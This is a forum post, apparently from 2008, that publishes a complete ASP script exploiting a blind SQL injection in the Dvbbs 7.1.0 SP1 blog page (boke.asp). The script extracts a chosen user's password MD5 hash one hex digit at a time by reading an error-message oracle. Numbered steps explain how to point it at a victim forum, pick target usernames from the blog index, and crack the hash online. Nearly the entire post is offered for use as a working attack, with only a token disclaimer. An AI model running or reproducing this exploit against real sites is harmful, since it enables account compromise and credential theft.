Dvbbs Blog exploit (Powered By Dvbbs Version 7.1.0 Sp1)
Posted by 樱木花盗 on 2008-2-13 2:08:14

The source is as follows:
<br><br> <br><br>
<center>
<div align='left' style="width:500px;font-size:12px;">
<%
Server.ScriptTimeout = 300
Response.Buffer = True
Dim hehefulsh
Dim charhex, OpenURL, tempstr, theoffset, total, GetPage

' The probe requests are sent from the server that hosts this page.
Set hehefulsh = CreateObject("Microsoft.XMLHTTP")
' Candidate characters: the stored hash is lowercase hex, so exactly one
' of these sixteen must match at every position.
charhex = Split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f", ",")
tempstr = ""   ' hash prefix recovered so far

' Outer loop: positions 1..16 of the 16-character MD5 stored by Dvbbs.
For total = 0 To 15
    ' Inner loop: try each hex digit as the next character. The injected
    ' condition  '<prefix><digit>'=left(password,N)  is true for one digit only.
    For theoffset = 0 To 15
        OpenURL = "http://www.03389.com/boke.asp?admin'and'" & tempstr & charhex(theoffset) & _
                  "'=left(password," & (total + 1) & ")and''='.index.html.index.html"
        hehefulsh.Open "GET", OpenURL, False, "", ""
        hehefulsh.Send
        GetPage = BytesToBstr(hehefulsh.ResponseBody)
        ' Boolean oracle: the error "该博客用户不存在或填写的资料有误!" (this blog user
        ' does not exist or the details are wrong) is shown only when the
        ' injected comparison is false, so its absence means the digit matched.
        If InStr(GetPage, "该博客用户不存在或填写的资料有误!") = 0 Then
            tempstr = tempstr & charhex(theoffset)
            Response.Write "First " & (total + 1) & " character(s) of the MD5: " & tempstr & _
                           " ... still reading the rest, please wait.<BR>"
            Response.Flush
            Exit For
        End If
    Next
Next
Response.Write "<br><br><br>Password MD5 read successfully: " & tempstr & _
               "<BR><BR><BR>Do not use this program for destructive purposes!"
Set hehefulsh = Nothing

' Decodes the raw GB2312 response bytes into a string so that InStr can
' match the Chinese error message.
Function BytesToBstr(body)
    Dim objstream
    Set objstream = Server.CreateObject("adodb.stream")
    objstream.Type = 1        ' binary
    objstream.Mode = 3        ' read/write
    objstream.Open
    objstream.Write body
    objstream.Position = 0
    objstream.Type = 2        ' text
    objstream.Charset = "GB2312"
    BytesToBstr = objstream.ReadText
    objstream.Close
    Set objstream = Nothing
End Function
%>
</div>
</center>
How to use it:
1> Create a new blank .asp page and paste the code above into it.
2> In the line
   OpenURL="http://www.03389.com/boke.asp?admin'and'" & tempstr & charhex(theoffset) & "'=left(password," &total+1& ")
   change http://www.03389.com/boke.asp to the address of the Dvbbs site you are attacking, and change admin to the user ID whose password you want to read. For example: the forum bbs.51nahan.com runs Dvbbs 7.1 SP1 and you want the password of the user "user". Then change
   OpenURL="http://www.03389.com/boke.asp?admin'and'" & tempstr & charhex(theoffset) & "'=left(password," &total+1& ")
   to
   OpenURL="http://bbs.51nahan.com/boke.asp?user'and'" & tempstr & charhex(theoffset) & "'=left(password," &total+1& ")
3> Host the file locally or on a remote site; either works. (It may be slow at first, but it will read the hash out. What you get is the MD5 hash of the password, not the password itself; you can try to look it up at www.cmd5.com.)
Tip: http://<target forum address>/bokeindex.asp is the Dvbbs blog front page, and it lists the names of users who have opened blogs. Swap admin in the example above for one of them. Heh heh!!!
Re: Dvbbs Blog exploit (Powered By Dvbbs Version 7.1.0 Sp1), comment by gf (guest) on 2012-8-9 14:37:48